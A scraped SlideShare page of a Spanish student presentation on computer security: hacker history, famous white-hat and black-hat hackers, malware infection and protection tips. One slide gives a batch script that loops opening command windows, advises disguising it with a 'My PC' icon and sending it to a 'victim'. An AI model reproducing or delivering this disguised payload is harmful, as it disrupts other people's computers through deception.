SlideShare una empresa de Scribd logo
1 de 25
SEGURIDAD INFORMATICA DEIBY JOHAN CALDERON OROZCO GERSON PASCUAL RODAS OCHOA TECNICO EN SISTEMAS 180604 CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL
SEGURIDAD INFORMATICA POR: DEIBY JOHAN CALDERON OROZCO GERSON PASCUAL RODAS OCHOA TECNICO EN SISTEMAS 180604 PRESENTADO A: ING. EDWIN ALEXANDER GOMEZ CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL
SEGURIDAD INFORMÁTICA
Reseña histórica sobre hackers No era así como se llamaban a sí mismos. Tampoco "hackers" ni nada parecido; el sobrenombre "Auténtico Programador" (Real Programmer) no sería usado hasta el año 1980, en que uno de ellos lo hizo de forma retrospectiva. Desde 1945, las tecnologías de la computación habían atraído a muchos de los cerebros más brillantes y creativos del mundo
Aparicion en el mercado tecnologico Una comunidad de entusiastas programadores y diseñadores de sistemas originada en los sesenta alrededor del Instituto Tecnológico de Massachusetts (MIT), el TechModelRailroad Club (TMRC) y el Laboratorio de Inteligencia Artificial del MIT. La comunidad de aficionados a la informática doméstica, centrada en el hardware posterior a los setenta y en el software (juegos de ordenador, crackeo de software, la demoscene) de entre los ochenta/noventa.
Los 5 más destacados en el mundo White hat: Stephen Wozniak Tim Berners-Lee LinusTorvalds Richard Stallman TsutomuShimomura
Stephen Wozniak “Woz” es el co-fundador de Apple, él y Steve Jobs fueron los creadores de Apple Wozempezó a hackear haciendo cajas azules (blue boxes) las cuales lograban imitar los sonidos del teléfono de ésa época logrando así llamadas gratuitas de larga distancia
Tim Berners-Lee Sir Timothy “Tim” John Berners-Lee, KBE (TimBL o TBL) es el creador de la Word Wide Web (WWW) Mientras fué estudiante en la universidad de Oxford, hackeaba con precaución junto con un amigo, y luego fuébetado de las computadoras de la Universidad
Linustorvalds es el padre de Linux. Se llama a si mismo “un ingeniero”, y dice que aspira a algo simple Creó el kernel/GNU de Linux en 1991, usando un sistema operativo llamado Minix como inspiración
Richard stallman La fama de Stallman viene de la fundación del código abierto, es conocido como el padre del Software libre tiene su comienzo en hackeo en el MIT. Él trabajó como un “staff hacker” en el proyecto de Emacs, y en otros. El criticaba el acceso restringido a las computadoras en el laboratorio. Cuando un sistema de passwords era instalado, Stallman lo rompía, y reseteaba los passwords como cadenas nulas, o “nullstrings”, luego enviava a los usuarios mensajes informándoles que ya no había sistema de passwords.
Tsutomoshimomura físico experto en seguridad conocido por colaborar con John Markoff y ayudar al FBI a arrestar a Kevin Mitnick Sin embargo TsutomuShimomura fue antes un hacker del mundo oscuro, pues invadió el sistema de la AT&T
Los 5 mas destacados en el mundo Black hat: Jonathan james Adrian lamo Kevin mitnick Kevin poulsen Robert tappanmorris
Jonathan james Las más importantes intrusiones de James tuvieron como objetivo organizaciones de alto grado. Él instaló un backdoor en un servidor de la Agencia de Reducción de Amenazas de la Defensa (DefenseThreatReduction Agency – DRTA).Es una agencia del Departamento de Defensa encargado de reducir las amenazas a los Estados Unidos y sus aliados de armas nucleares, biológicas, químicas, convencionales y especiales. El backdoor que el creó le permitió ver emails de asuntos delicados y capturar los nombres de usuario (username) y clave (passwords) de los empleados.
Adiran lamo Lamo saltó a la fama por sus intrusiones a organizaciones mayores como The New York Times and Microsoft. Bajo el apodo de “homeless hacker” (hacker sin hogar), el usó conexiones como Kinko (internet cafés), tiendas café y librerías para hacer sus intrusiones. En un articulo de su perfil, Lamo reflexiona “Tengo una computadora portátil en Pittsburg, me cambio de ropas en Washington D.C., para dar una idea de mi juridiscionabilidad”
Kevin mitnick fue acusado de robo de software, fraude electrónico, daño a los ordenadores de la Universidad del Sur de California, robo de archivos e intercepción de mensajes de correo electrónico. Entre las compañías afectadas figuraban Nokia, Fujitsu, Nec, Novell, Sun Microsystems, Motorola, Apple…
Kevin poulson Tambien conocido como “Dark Dante”, Pulsen ganó reconocimiento cuando hackeó las lineastelefonicas de la radio de Los Angeles “KISS FM”, con lo cual obtuvo ganancias para comprarse un Porsche, entre otras cosas. Las fuerzas del orden lo apodaron “El HannibaLecter del crimen informatico”. Las autoridades comenzaron a perseguir a Poulsendespues que hackeara una base de datos de investigación federal
Robert tappanmorris Tappan Morris es hijo de un científico de la Agencia Nacional de Seguridad, y conocido como el creador del Gusano Morris, el primer gusano desencadenado en Internet. Morris escribió el código del gusano cuando era estudiante de CornellUniversity. Su intención era usarlo para ver que tan largo era Internet, pero el gusano se replicaba excesivamente, haciendo las computadoras demasiado lentas
Como atacan la seguridad de los equipos Normalmente este tipo de programas se pega a alguna entidad ejecutable que le facilitará la subida a memoria principal y la posterior ejecución (métodos de infección). Como entidades ejecutables podemos reconocer a los sectores de arranque de los discos de almacenamiento magnéticos, ópticos o magneto-ópticos (MBR, BR), los archivos ejecutables de DOSs (.exe, .com, entre otros), las librerías o módulos de programas (.dll, .lib, .ovl, .bin, .ovr). Los sectores de arranque son fundamentales para garantizar que el virus será cargado cada vez que se encienda la computadora.
Como protegerse de ataques de hackers  Nunca proporcionar datos personales a un correo electrónico o un mensaje de “emergente” mientras en línea. Esto se llama phishing cuando un ladrón intenta conseguir que le dan sus datos. Instalar un software de seguridad de confianza y eficiente en el equipo de casa. Esto evitará que virus infecte su equipo y el robo de datos importantes. Mantener el software actualizado.
Cómo descubrimos que estamos siendo atacados por un hacker Algunas de las formas de darse cuenta es cuando llegan muchos correos basura, o cuando llegan correos como del banco pidiendo contraseñas o peor cuando al revisar el ordenador se da uno cuenta que hay archivos corrompidos o que no estan y el computador tiene virus, que algunos no los detecta el antivirus.
Como operan los hackers Los hackers principal recurso dependen, además de su propio ingenio, es un código informático. Si bien existe una gran comunidad de hackers en Internet, sólo un número relativamente pequeño de hackers en realidad el código del programa. Muchos hackers buscar y descargar el código escrito por otras personas. Hay miles de diferentes programas de los hackers utilizan para explorar las computadoras y redes. Estos programas dan a los piratas una gran cantidad de poder sobre los usuarios inocentes y las organizaciones - una vez un hacker experto sabe cómo funciona un sistema, se pueden diseñar programas que se aprovechan de ella.
Programas Algunos de los programas que les facilitan son: Keyloggers:elprograma de registro de cada golpe de teclado, dando todo al hacker que tiene que infiltrarse en un sistema o incluso robar la identidad de alguien. virus: Los virus informáticos son programas diseñados para que se dupliquen y causar problemas que van desde estrellarse un equipo a exterminar a todo en el disco duro de un sistema
Qué programa sirve para proteger las memorias usb de los virus Normalmente al llevar una usb tipo pendrive, lo que se supone es que si un equipo esta infectado, la usbtambien quede infectada, en la mayoria de los casos, por lo que antes de abrirla pasarle un antivirus, pues estos no son preventivos sino correctivos.
Cómo  se crea un virus  1. Abre el bloc de notas 2. Escribe el siguiente código: @echo off :a start start start start start start goto :a 3. Vete a archivo -> guardar como: Mi PC.bat , esto es el nombre del archivo, lo puedes llamar como quieras pero que termine en .bat. En tipo has de seleccionar todos los archivos 4. Puedes cambiar el icono por otro que te guste, por ejemplo por el de Mi PC, de esta manera pasará desapercibido. 5. Ya se lo puedes enviar a tu victima. Es un virus inofensivo, lo que hace el script, es abrir CMD seis veces continuamente y no tienes manera de detenerlo, simplemente reinicia el ordenador y el problema estará solucionado. Lo podemos considerar un truco del bloc de notas.
Como se eliminan El software antivirus contrarresta de varias maneras los efectos de los virus informáticos para detectarlos. La mayoría de las soluciones se basan en tres componentes para la detección: exploración de acceso, exploración requerida, y suma de comprobación.

Más contenido relacionado

La actualidad más candente

La actualidad más candente (9)

Revista digital
Revista digitalRevista digital
Revista digital
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
hackers
hackershackers
hackers
 
Hackers
HackersHackers
Hackers
 
Seguridad de informatica
Seguridad de informaticaSeguridad de informatica
Seguridad de informatica
 
Informatica virus
Informatica virusInformatica virus
Informatica virus
 
Virus informáticos
Virus informáticosVirus informáticos
Virus informáticos
 
Diferentes amenazas de seguridad informatica
Diferentes amenazas de seguridad informaticaDiferentes amenazas de seguridad informatica
Diferentes amenazas de seguridad informatica
 

Destacado

Solucion guia registro windows_180604
Solucion guia registro windows_180604Solucion guia registro windows_180604
Solucion guia registro windows_180604deibyctc180604
 
Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604deibyctc180604
 
Comunicaciones con Alta Disponibilidad
Comunicaciones con Alta DisponibilidadComunicaciones con Alta Disponibilidad
Comunicaciones con Alta DisponibilidadÍñigo Ramos Barrio
 
Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604deibyctc180604
 
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión SocialLas Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión SocialFitelPeru
 
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las RegionesBanda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las RegionesFitelPeru
 

Destacado (9)

Solucion guia registro windows_180604
Solucion guia registro windows_180604Solucion guia registro windows_180604
Solucion guia registro windows_180604
 
Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604
 
Sistemas operativos
Sistemas operativosSistemas operativos
Sistemas operativos
 
Comunicaciones con Alta Disponibilidad
Comunicaciones con Alta DisponibilidadComunicaciones con Alta Disponibilidad
Comunicaciones con Alta Disponibilidad
 
Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604
 
Fibra optica
Fibra opticaFibra optica
Fibra optica
 
Fibra optica
Fibra opticaFibra optica
Fibra optica
 
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión SocialLas Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
 
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las RegionesBanda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
 

Similar a Seguridad informática

Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correasebascorrea27
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correasebascorrea27
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2011
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticanadia82
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticatatii2011
 
Reseña histórica de los hackers
Reseña histórica de los hackersReseña histórica de los hackers
Reseña histórica de los hackersvicuty2179
 
Reseña histórica de los hackers
Reseña histórica de los hackersReseña histórica de los hackers
Reseña histórica de los hackersvicuty2179
 
Seguridad Informatica Hackers
Seguridad Informatica HackersSeguridad Informatica Hackers
Seguridad Informatica Hackersvicuty2179
 
Solución guia s.operativos_294503(1)
Solución  guia s.operativos_294503(1)Solución  guia s.operativos_294503(1)
Solución guia s.operativos_294503(1)luisa1200
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503stefannyquiroga
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503haroldm2011
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503haroldm2011
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503haroldm2011
 

Similar a Seguridad informática (20)

Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correa
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correa
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
S.oper 180604.pps[1]
S.oper 180604.pps[1]S.oper 180604.pps[1]
S.oper 180604.pps[1]
 
Reseña histórica de los hackers
Reseña histórica de los hackersReseña histórica de los hackers
Reseña histórica de los hackers
 
Reseña histórica de los hackers
Reseña histórica de los hackersReseña histórica de los hackers
Reseña histórica de los hackers
 
Seguridad Informatica Hackers
Seguridad Informatica HackersSeguridad Informatica Hackers
Seguridad Informatica Hackers
 
Solución guia s.operativos_294503(1)
Solución  guia s.operativos_294503(1)Solución  guia s.operativos_294503(1)
Solución guia s.operativos_294503(1)
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 

Último

Fundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdfFundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdfsamyarrocha1
 
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdfTema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdfDaniel Ángel Corral de la Mata, Ph.D.
 
CIENCIAS NATURALES 4 TO ambientes .docx
CIENCIAS NATURALES 4 TO  ambientes .docxCIENCIAS NATURALES 4 TO  ambientes .docx
CIENCIAS NATURALES 4 TO ambientes .docxAgustinaNuez21
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...fcastellanos3
 
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfBIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfCESARMALAGA4
 
libro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación iniciallibro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación inicialLorenaSanchez350426
 
La Función tecnológica del tutor.pptx
La  Función  tecnológica  del tutor.pptxLa  Función  tecnológica  del tutor.pptx
La Función tecnológica del tutor.pptxJunkotantik
 
Monitoreo a los coordinadores de las IIEE JEC_28.02.2024.vf.pptx
Monitoreo a los coordinadores de las IIEE JEC_28.02.2024.vf.pptxMonitoreo a los coordinadores de las IIEE JEC_28.02.2024.vf.pptx
Monitoreo a los coordinadores de las IIEE JEC_28.02.2024.vf.pptxJUANCARLOSAPARCANARE
 
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docxPLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docxJUANSIMONPACHIN
 
Estrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdfEstrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdfromanmillans
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxMartín Ramírez
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUgustavorojas179704
 
Manejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsaManejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsaLuis Minaya
 
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOweislaco
 
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALVOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALEDUCCUniversidadCatl
 
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024gharce
 

Último (20)

Fundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdfFundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdf
 
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdfTema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
 
CIENCIAS NATURALES 4 TO ambientes .docx
CIENCIAS NATURALES 4 TO  ambientes .docxCIENCIAS NATURALES 4 TO  ambientes .docx
CIENCIAS NATURALES 4 TO ambientes .docx
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
 
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfBIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
 
Tema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdf
Tema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdfTema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdf
Tema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdf
 
libro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación iniciallibro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación inicial
 
La Función tecnológica del tutor.pptx
La  Función  tecnológica  del tutor.pptxLa  Función  tecnológica  del tutor.pptx
La Función tecnológica del tutor.pptx
 
Monitoreo a los coordinadores de las IIEE JEC_28.02.2024.vf.pptx
Monitoreo a los coordinadores de las IIEE JEC_28.02.2024.vf.pptxMonitoreo a los coordinadores de las IIEE JEC_28.02.2024.vf.pptx
Monitoreo a los coordinadores de las IIEE JEC_28.02.2024.vf.pptx
 
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docxPLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
 
Estrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdfEstrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdf
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
 
La luz brilla en la oscuridad. Necesitamos luz
La luz brilla en la oscuridad. Necesitamos luzLa luz brilla en la oscuridad. Necesitamos luz
La luz brilla en la oscuridad. Necesitamos luz
 
Earth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversaryEarth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversary
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
 
Manejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsaManejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsa
 
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
 
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALVOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
 
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
 
VISITA À PROTEÇÃO CIVIL _
VISITA À PROTEÇÃO CIVIL                  _VISITA À PROTEÇÃO CIVIL                  _
VISITA À PROTEÇÃO CIVIL _
 

Seguridad informática

  • 1. SEGURIDAD INFORMATICA DEIBY JOHAN CALDERON OROZCO GERSON PASCUAL RODAS OCHOA TECNICO EN SISTEMAS 180604 CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL
  • 2. SEGURIDAD INFORMATICA POR: DEIBY JOHAN CALDERON OROZCO GERSON PASCUAL RODAS OCHOA TECNICO EN SISTEMAS 180604 PRESENTADO A: ING. EDWIN ALEXANDER GOMEZ CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL
  • 4. Reseña histórica sobre hackers No era así como se llamaban a sí mismos. Tampoco "hackers" ni nada parecido; el sobrenombre "Auténtico Programador" (Real Programmer) no sería usado hasta el año 1980, en que uno de ellos lo hizo de forma retrospectiva. Desde 1945, las tecnologías de la computación habían atraído a muchos de los cerebros más brillantes y creativos del mundo
  • 5. Aparicion en el mercado tecnologico Una comunidad de entusiastas programadores y diseñadores de sistemas originada en los sesenta alrededor del Instituto Tecnológico de Massachusetts (MIT), el TechModelRailroad Club (TMRC) y el Laboratorio de Inteligencia Artificial del MIT. La comunidad de aficionados a la informática doméstica, centrada en el hardware posterior a los setenta y en el software (juegos de ordenador, crackeo de software, la demoscene) de entre los ochenta/noventa.
  • 6. Los 5 más destacados en el mundo White hat: Stephen Wozniak Tim Berners-Lee LinusTorvalds Richard Stallman TsutomuShimomura
  • 7. Stephen Wozniak “Woz” es el co-fundador de Apple, él y Steve Jobs fueron los creadores de Apple Wozempezó a hackear haciendo cajas azules (blue boxes) las cuales lograban imitar los sonidos del teléfono de ésa época logrando así llamadas gratuitas de larga distancia
  • 8. Tim Berners-Lee Sir Timothy “Tim” John Berners-Lee, KBE (TimBL o TBL) es el creador de la Word Wide Web (WWW) Mientras fué estudiante en la universidad de Oxford, hackeaba con precaución junto con un amigo, y luego fuébetado de las computadoras de la Universidad
  • 9. Linustorvalds es el padre de Linux. Se llama a si mismo “un ingeniero”, y dice que aspira a algo simple Creó el kernel/GNU de Linux en 1991, usando un sistema operativo llamado Minix como inspiración
  • 10. Richard stallman La fama de Stallman viene de la fundación del código abierto, es conocido como el padre del Software libre tiene su comienzo en hackeo en el MIT. Él trabajó como un “staff hacker” en el proyecto de Emacs, y en otros. El criticaba el acceso restringido a las computadoras en el laboratorio. Cuando un sistema de passwords era instalado, Stallman lo rompía, y reseteaba los passwords como cadenas nulas, o “nullstrings”, luego enviava a los usuarios mensajes informándoles que ya no había sistema de passwords.
  • 11. Tsutomoshimomura físico experto en seguridad conocido por colaborar con John Markoff y ayudar al FBI a arrestar a Kevin Mitnick Sin embargo TsutomuShimomura fue antes un hacker del mundo oscuro, pues invadió el sistema de la AT&T
  • 12. Los 5 mas destacados en el mundo Black hat: Jonathan james Adrian lamo Kevin mitnick Kevin poulsen Robert tappanmorris
  • 13. Jonathan james Las más importantes intrusiones de James tuvieron como objetivo organizaciones de alto grado. Él instaló un backdoor en un servidor de la Agencia de Reducción de Amenazas de la Defensa (DefenseThreatReduction Agency – DRTA).Es una agencia del Departamento de Defensa encargado de reducir las amenazas a los Estados Unidos y sus aliados de armas nucleares, biológicas, químicas, convencionales y especiales. El backdoor que el creó le permitió ver emails de asuntos delicados y capturar los nombres de usuario (username) y clave (passwords) de los empleados.
  • 14. Adiran lamo Lamo saltó a la fama por sus intrusiones a organizaciones mayores como The New York Times and Microsoft. Bajo el apodo de “homeless hacker” (hacker sin hogar), el usó conexiones como Kinko (internet cafés), tiendas café y librerías para hacer sus intrusiones. En un articulo de su perfil, Lamo reflexiona “Tengo una computadora portátil en Pittsburg, me cambio de ropas en Washington D.C., para dar una idea de mi juridiscionabilidad”
  • 15. Kevin mitnick fue acusado de robo de software, fraude electrónico, daño a los ordenadores de la Universidad del Sur de California, robo de archivos e intercepción de mensajes de correo electrónico. Entre las compañías afectadas figuraban Nokia, Fujitsu, Nec, Novell, Sun Microsystems, Motorola, Apple…
  • 16. Kevin poulson Tambien conocido como “Dark Dante”, Pulsen ganó reconocimiento cuando hackeó las lineastelefonicas de la radio de Los Angeles “KISS FM”, con lo cual obtuvo ganancias para comprarse un Porsche, entre otras cosas. Las fuerzas del orden lo apodaron “El HannibaLecter del crimen informatico”. Las autoridades comenzaron a perseguir a Poulsendespues que hackeara una base de datos de investigación federal
  • 17. Robert tappanmorris Tappan Morris es hijo de un científico de la Agencia Nacional de Seguridad, y conocido como el creador del Gusano Morris, el primer gusano desencadenado en Internet. Morris escribió el código del gusano cuando era estudiante de CornellUniversity. Su intención era usarlo para ver que tan largo era Internet, pero el gusano se replicaba excesivamente, haciendo las computadoras demasiado lentas
  • 18. Como atacan la seguridad de los equipos Normalmente este tipo de programas se pega a alguna entidad ejecutable que le facilitará la subida a memoria principal y la posterior ejecución (métodos de infección). Como entidades ejecutables podemos reconocer a los sectores de arranque de los discos de almacenamiento magnéticos, ópticos o magneto-ópticos (MBR, BR), los archivos ejecutables de DOSs (.exe, .com, entre otros), las librerías o módulos de programas (.dll, .lib, .ovl, .bin, .ovr). Los sectores de arranque son fundamentales para garantizar que el virus será cargado cada vez que se encienda la computadora.
  • 19. Como protegerse de ataques de hackers Nunca proporcionar datos personales a un correo electrónico o un mensaje de “emergente” mientras en línea. Esto se llama phishing cuando un ladrón intenta conseguir que le dan sus datos. Instalar un software de seguridad de confianza y eficiente en el equipo de casa. Esto evitará que virus infecte su equipo y el robo de datos importantes. Mantener el software actualizado.
